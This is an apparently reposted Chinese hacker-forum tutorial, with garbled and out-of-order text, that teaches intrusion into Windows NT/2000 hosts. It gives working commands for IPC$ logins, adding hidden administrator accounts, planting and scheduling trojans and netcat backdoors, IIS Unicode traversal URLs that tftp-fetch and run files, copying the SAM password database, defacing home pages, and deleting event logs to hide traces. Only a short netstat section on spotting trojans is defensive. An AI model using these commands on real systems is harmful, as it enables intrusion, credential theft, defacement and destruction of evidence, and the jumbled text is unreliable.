1、菜鸟常用命令(与远程主机建立空管连接)net use ip 地址 ipc$ /use:(以管理员身份登录远程主机)net use ip 地址 ipc$ 密码 /use:administrator(传送文件到远程主机winnt 目录下) copy 本机目录路径程序ip 地址 admin$(查看远程主机时间)net time ip 地址(定时启动某个程序)at ip 地址02:18 readme.exe(查看共享)net view ip地址(查看 netbios工作组列表)nbtstat -a ip 地址(将远程主机c 盘映射为自己的f 盘) net use f: ip 地址 c$ /user:a
2、dministrator(这两条把自己增加到管理员组): net user 用户名 密码 /addnet localgroup administrators用户名 /add(断开连接)net use ip 地址 ipc$ /deletedel c:winntsystem32logfiles*.*del c:winntssytem32config*.evtdel c:winntsystem32dtclog*.*del c:winntsystem32*.logdel c:winntsystem32*.txtdel c:winnt*.txtdel c:winnt*.log一、 netsvc.exe下
3、面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:netsvc /list ip 地址netsvc schedule ip 地址 /querynetsvc ip 地址schedule /start二、 opentelnet.exe远程启动主机的telnet 服务,并绑定端口到7878,例如:opentelnet ip 地址用户名密码1 7878然后就可以telnet 到主机的7878 端口,进入dos 方式下:telnet ip 地址7878三、 winshell.exe一个非常小的木马(不到6k),telnet 到主机的7878 端口,输入密码winshell ,当看
4、到 cmd后,可打下面的命令:p path (查看 winshell 主程序的路径信息)b reboot (重新启动机器)d shutdown (关闭机器)s shell (执行后你就会看到可爱的“c:”)x exit (退出本次登录会话,此命令并不终止winshell 的运行)cmd http:/./srv.exe(通过 http 下载其他网站上的文件到运行winshell 的机器上)四、 3389 登陆器, gui 方式登录远程主机的五、 elsave.exe事件日志清除工具elsave -s ip 地址-l application -celsave -s ip 地址-l system -
5、celsave -s ip 地址-l security -c执行后成功清除应用程序日志,系统日志,安全日志六、 hbulot.exe开启 win2kserver 和 winxp 的 3389 服务hbulot /r使用 /r 表示安装完成后自动重起目标使设置生效。七、 nc.exe(netcat.exe)一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。想要连接到某处: nc -options hostname ports ports .绑定端口等待连接: nc -l -p port -options hostname port参数 :-e prog 程序重定向,一旦连接,就执行-
6、g gateway source-routing hop points, up to 8-g num source-routing pointer: 4, 8, 12, .-h 帮助信息-i secs 延时的间隔-l 监听模式,用于入站连接-n 指定数字的ip 地址,不能用hostname-o file记录 16 进制的传输-p port 本地端口号-r 任意指定本地及远程端口-s addr 本地源地址-u udp 模式-v 详细输出用两个-v 可得到更详细的内容-w secs timeout 的时间-z 将输入输出关掉用于扫描时 危险 !八、 tftpd32.exe把自己的电脑临时变为一台
7、ftp 服务器,让肉鸡来下载文件, tftp 命令要在肉鸡上执行,通常要利用 unicode 漏洞或 telnet 到肉鸡,例如:http:/ip地址/s cripts/.%255c.%255c/winnt/system32/cmd.exe?/c tftp -i本机ip地址get文件名文件名然后可以直接令文件运行:http:/ip地址/s cripts/.%255c.%255c/winnt/system32/cmd.exe?/c+文件名九、 prihack.exe 是 iis 的 printer 远程缓冲区溢出工具idqover.exe 是溢出 idq 的,选择“溢出后在一个端口监听”,然后用
8、 telnet 连接它的监听端口,如果溢出成功, 一连它的端口, 绑定的命令马上执行。 xploit.exe 是一个图形界面的 ida 溢出,成功以后 winxp 下需要打 winxp 。ntis.exe、cmd.exe 和 cmdasp.asp 是三个 cgi-backdoor ,exe 要放到 cgi-bin 目录下, asp 放到有 asp 执行权限的目录。然后用 ie 浏览器连接。十、弱口令在 nt2000xp2003 中弱口令可以用ip“ password ” /user:user如果目标机开3389 服务 ,可以直接连接在 sql 的 sa 弱口令可以用sql 连接器直接登陆后门木
9、马如果有 ipc$共享 ,可以 copy 过去木马后门用 at 启动AT ip time /INTERACTIVE如果可以得到shell, 也可以用tftpTftp.exe ?Ci ip get *.* *.*然后直接安装如果有3389,可以自己建一个iis,下载直接运行管理特殊端口防范木马攻击.木马是一种带有恶意性质的远程控制软件,木马一般分为客户端(Client) 和服务器端 (Server) ,客户端就是本地使用的各种命令的控制台,服务器端则是给别人运行,只有运行过服务器端的计算机才能够完全受控。当前最为常见的木马通常是基于 TCP/UDP 协议进行 client 端与 server 端
10、之间的通讯的,既然利用到这两个协议, 就不可避免要在 server 端(就是被种了木马的机器了) 打开监听端口来等待连接。例如鼎鼎大名的冰河使用的监听端口是 7626 ,Back Orifice 2000 则是使用 54320 等等。那么,我们可以利用查看本机开放端口的方法来检查自己是否被种了木马或其它 hacker 程序。以下是详细方法介绍。Windows 本身自带的 netstat 命令Netstat 显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。netstat -a -e -n -s -p protocol -r interval参数-
11、a 显示所有连接和侦听端口。服务器连接通常不显示。-e 显示以太网统计。该参数可以与-s 选项结合使用。-n 以数字格式显示地址和端口号(而不是尝试查找名称)。-s显示每个协议的统计。默认情况下,显示TCP、 UDP 、 ICMP和IP的统计。-p选项可以用来指定默认的子集。-p protocol显示由protocol选项一同使用显示每个协议的统计,指定的协议的连接;protocol 可以是protocol可以是tcp 、udp、 icmptcp 或或 udp。如果与ip。-s-r显示路由表的内容。interval重新显示所选的统计,在每次显示之间暂停interval新显示统计。如果省略该参数
12、,netstat 将打印一次当前的配置信息。秒。按CTRL+B停止重现在,我们掌握 netstat 命令的使用方法了,下面就让我们现学现用,用这个命令看一下自己的机器开放的端口。进入到命令行下,使用 netstat 命令的 a 和 n 两个参数:C:netstat -a -nActive ConnectionsProto Local ADDRess Foreign Address StateTCP 0.0.0.0:80 0.0.0.0:0 LISTENINGTCP 0.0.0.0:21 0.0.0.0:0 LISTENINGTCP 0.0.0.0:7626 0.0.0.0:0 LISTENIN
13、GUDP 0.0.0.0:445 0.0.0.0:0UDP 0.0.0.0:1046 0.0.0.0:0UDP 0.0.0.0:1047 0.0.0.0:0解释一下, Active Connections 是指当前本机活动连接,Proto 是指连接使用的协议名称,Local Address 是本地计算机的 IP 地址和连接正在使用的端口号, Foreign Address 是连接该端口的远程计算机的 IP 地址和端口号, State 则是表明 TCP 连接的状态,你可以看到后面三行的监听端口是 UDP 协议的,所以没有 State 表示的状态。通过以上可以看出该机器的7626 端口已经开放,正
14、在监听等待连接,像这样的情况极有可能是已经感染了冰河!所以应该急忙断开网络,并用杀毒软件查杀病毒。转载请注明出自黑客手册技术论坛 http:/ 本贴地址 :http:/ 很多人想成为黑客, 他们偶尔学到了几种小花招, 总喜欢拿别人开玩笑,搞些恶作剧。其实黑客的最高境界在于防守,不在于进攻。所谓明枪易躲暗箭难防,要防住他人所有的进攻,肯定需要懂得比对方更多的系统知识,了解更多的系统漏洞,及如何弥补漏洞。 现在满天都是黑客教程,但真正有用的不多,下面介绍一种 WIN9X 下的入侵方法 :1.取得对方IP 地址如 XX.XX.XX.XX,方法太多不细讲了。2.判断对方上网的地点,开个DOS 窗口键入
15、TRACERT XX.XX.XX.XX第 4 和第 5 行反映的信息既是对方的上网地点。3.得到对方电脑的名称,开个DOS 窗口键入NBTSTAT -A XX.XX.XX.XX第一行是对方电脑名称第二行是对方电脑所在工作组第三行是对方电脑的说明4.在 Windows 目录下有一文件名为LMHOSTS.SAM ,将其改名为LMHOSTS ,删除其内容,将对方的IP 及电脑名按以下格式写入文件:XX.XX.XX.XX电脑名5.开 DOS 窗口键入NBTSTAT -R6.在开始 -查找 - 电脑中输入对方电脑名,出现对方电脑点击即可进入。以上方法请不要乱用,本人对你用上面的方法所惹出的麻烦概不负责,
16、请慎重。对付上面进攻的最好办法就是隐藏你的IP 地址。转载请注明出自黑客手册技术论坛 http:/ 本贴地址 :http:/ NET只要你拥有某IP 的用户名和密码,那就用IPC$ 做连接吧!这里我们假如你得到的用户是hbx,密码是123456。假设对方IP 为 127.0.0.1net use 127.0.0.1ipc$ 123456 /user:hbx退出的命令是net use 127.0.0.1ipc$ /delte下面的操作你必须登陆后才可以用,登陆的方法就在上面。下面我们讲怎么创建一个用户,由于SA 的权限相当于系统的超级用户。我们加一个heibai的用户密码为lovechinane
17、t user heibai lovechina /add只要显示命令成功,那么我们可以把他加入Administrator 组了。net localgroup Administrators heibai /add这里是讲映射对方的C 盘,当然其他盘也可以,只要存在就行了。我们这里把对方的C 盘映射到本地的Z 盘,net use z:127.0.0.1c$net start telnet这样可以打开对方的TELNET服务。这里是将 Guest 用户激活, guest 是 NT 的默认用户, 而且无法删除呢?不知道是否这样,我的 Windows2000 就是删除不了它。这里是把一个用户的密码改掉,我
18、们把 guest 的密码改为 lovechina ,其他用户也可以的。只要有权限就行了呀!net user guest lovechinanet 命令果然强大啊!2、 At一般一个入侵者入侵后都会留下后门, 也就是种木马了, 你把木马传了上去, 怎么启动他呢?那么需要用 AT 命令,这里假设你已经登陆了那个服务器。你首先要得到对方的时间,net time 127.0.0.1将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1at 127.0.0.1 12:3 nc.exe这里假设了一个木马,名为NC.EXE ,这个东西要在对方服务器上。这里介绍一下 NC ,NC 是 NE
19、TCAT 的简称,为了方便输入, 一般会被改名。 它是一个 TELNET 服务,端口为 99。等到了 12:3 就可以连接到对方的 99 端口,这样就给对方种下了木马。3、 Telnet这个命令非常实用, 它可以与远方做连接,不过正常下需要密码、 用户,不过你给对方种了木马,直接连到这个木马打开的端口。telnet 127.0.0.1 99这样就可以连到对方的99 端口,那你就可以在对方运行命令了,这个也就是肉鸡。4、 FTP它可以将你的东西传到对方机子上,你可以去申请个支持FTP 上传的空间,国内多的是,如果真的找不到,我给个www.51.NET ,不错的。当我们申请完后,它会给用户名,密码
20、,以及 FTP 服务器。在上传前需要登陆先,这里我们假设FTP 服务器是www.51.NET ,用户名是 HUCJS,密码是654321。ftp http:/他会要求输入用户,成功后会要求输入密码。下面先说上传,假设你需上传的文件是INDEX.HTM ,它位于下,传到对方D:get c:index.htm d:假设你要把对方C 盘下的 INDEX.HTM,下到你的机子的D 盘下put c:index.htm d:5、 Copy下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好们把本地 C 盘下的 index.htm 复制到 127.0.0.1 的 C 盘下IPC$连接才有效。这里我cop
21、y index.htm 127.0.0.1c$index.htm如果你要复制到D 盘下把 C 改为 D ,就行了!如果你要把他复制到WINNT目录里,就要把输入copy index.htm 127.0.0.1admin$index.htmadmin$ 是 winnt要把对方的文件复制过来,顺便告诉大家NT 的备份的数据库放在是数据库的文件名。下面就把127.0.0.1 的数据库复制到本地Cx:winntrepairsam._ sam._ 盘下copy 127.0.0.1admin$repairsam._ c:6、 Set如果你跑进了一部机子, 而且想黑他 (这思想只能在特别时候才准有) ,当然
22、他的 80 端口要开,不然你黑给谁看。这时需要用 SET 命令!下面是我得到的结果!我来分析它,只是找主页在那而已。COMPUTERNAME=PENTIUMIIComSpec=D:WINNTsystem32cmd.exeCONTENT_LENGTH=0GATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=*/*HTTP_ACCEPT_LANGUAGE=zh-cnHTTP_CONNECTION=Keep-AliveHTTP_HOST= 当前登陆者的IP,这里本来是显示我的IP,被我删除了HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_USER_A
23、GENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)NUMBER_OF_PROCESSORS=1Os2LibPath=D:WINNTsystem32os2dll;OS=Windows_NTPath=D:WINNTsystem32;D:WINNTPATHEXT=.COM;.EXE;.BAT;.CMDPATH_TRANSLATED=E:vlroot主页放在的地址, 只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlrootPROCESSOR_ARCHITECTURE=x86PROCESSOR_IDEN
24、TIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=0303PROMPT=$P$GQUERY_STRING=/c+setREMOTE_ADDR=XX.XX.XX.XXREMOTE_HOST=XX.XX.XX.XXREQUEST_METHOD=GETSCRIPT_NAME=/scripts/.%2f./winnt/system32/cmd.exeSERVER_NAME=XX.XX.XX.XXSERVER_PORT=80SERVER_PORT_SECURE=0SERVER_P
25、ROTOCOL=HTTP/1.1SERVER_SOFTWARE=Microsoft-IIS/3.0 对方使用 IIS/3.0 SystemDrive=D:SystemRoot=D:WINNTTZ=GMT-9USERPROFILE=D:WINNTProfilesDefault Userwindir=D:WINNT粉红色的那行就是对方主页存放地址, 这里告诉大家一个技巧, 很笨的技巧啊, 不过只能用这个方法才能 100% 的找到主页的名称,当你 DIR 这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模
26、一样,那么这就是主页的名称了。7、 Nbtstat如果你扫到一部NT 的机子, 他的 136 到 139 其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是 netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!现在网上很多 NT 的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。命令是nbtstat -A XX.XX.XX.XX-A 一定要大写哦,下面是得到的结果。NetBIOS Remote Machine Name TableName Type Status-Registered Registered Re
27、gistered Registered Registered Registered Registered Registered Registered Registered RegisteredMAC Address = 00-E0-29-14-35-BAPENTIUMII UNIQUEPENTIUMII UNIQUEORAHOTOWN GROUPORAHOTOWN GROUPORAHOTOWN UNIQUEPENTIUMII UNIQUEINetServices GROUPISPENTIUMII. UNIQUEORAHOTOWN GROUPORAHOTOWN UNIQUE._MSBROWSE_
28、. GROUP粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 的话,那他前面的就是用户,这里的用户是PENTIUMII 。8、 Shutdown关了对方的NT 服务器的命令Shutdown IP 地址t:2020 秒后将 NT 自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。9、 DIR这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。你可以本地试下。10、 Echo著名的漏洞Unicode ,这个命令可以简单的黑一下有这个漏洞的主机。京大屠杀铁证如山,任何* 人不得抵赖! ”写入index
29、.htm ,有 2区别。我们假设我们要把 “南种方法,大家看看有什么echo南京大屠杀铁证如山,任何* 人不得抵赖!index.htmecho南京大屠杀铁证如山,任何* 人不得抵赖!index.htm第一个的意思是覆盖 index.htm 原有的内容,把“南京大屠杀铁证如山, 任何 * 人不得抵赖! ” 写进 index.htm ;第二个的意思是把“南京大屠杀铁证如山,任何 * 人不得抵赖! ”加到index.htm里面。“ ”产生的内容将追加进文件中, “ ”则将原文件内容覆盖。大家可以本地试下。可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。(1) 首先,我们需
30、要申请一个免费的主页空间。(2) 用 echo 在可写目录下建立如下内容的txt 文件:(以 chinren 服务器为例。)open (你的 FTP 服务器,申请时你的空间提供商会给你的)cnhack(你申请时的用户名)test(你申请时的密码)get index.htm c:inetpubwwwrootindex.htm(这里是把你空间上的index.htm 下载到对方的c:inetpubwwwrootindex.htm )bye(退出 FTP 对话,相当在98 下的 DOS,用 EXIT 退出 DOS )具体的做法:输入echo open c:cnhack.txt输入echo cnhac
31、k c:cnhack.txt输入echo 39abs c:cnhack.txt输入echo get index.htm c:inetpubwwwrootindex.htm+c:cnhack.txt最后输入 ftp -s:c:cnhack.txt (利用 ftp 的 -s 参数,执行文件里的内容。 )等命令完成时,文件已经下载到你指定的文件里了。注意:取得文件后,请删除得要 del c:cnhack.txt 。cnhack.txt 。(如果不删除,很容易会给别人看到你的密码。) 记11、 Attrib这个命令是设置文件属性的。 如果你想黑一个站, 而他的主页的文件属性设置了只读, 那就很可怜呀,
32、想删除他也不行,想覆盖他也不行。不过有这个命令就别怕了。attrib -r index.htm这个命令是把 index.htm 的只读属性去掉。如果把“ -”改为“ +”则是把这个文件的属性设置为只读。attrib +r index.htm这个命令是把index.htm 的属性设置为只读。12、 Del当你看到这个标题可别倒下啊!现在要离开想被捉吗,呵呵。 NT 的日志有这些127.0.0.1了,要删除日志,当然要删除日志啦!del C:winntsystem32logfiles*.*del C:winntssytem32config*.evtdel C:winntsystem32dtclog*.*del C:winntsystem32*.logdel C:winntsystem32*.txtdel C:winnt*.txtdel C:winnt*.log只要删除这些就可以了,有些系统NT 安装在 D 盘或其他盘,就要把C 改成其他盘。转载请注明出自黑客手册技术论坛 http:/ 本贴地址 :http:/
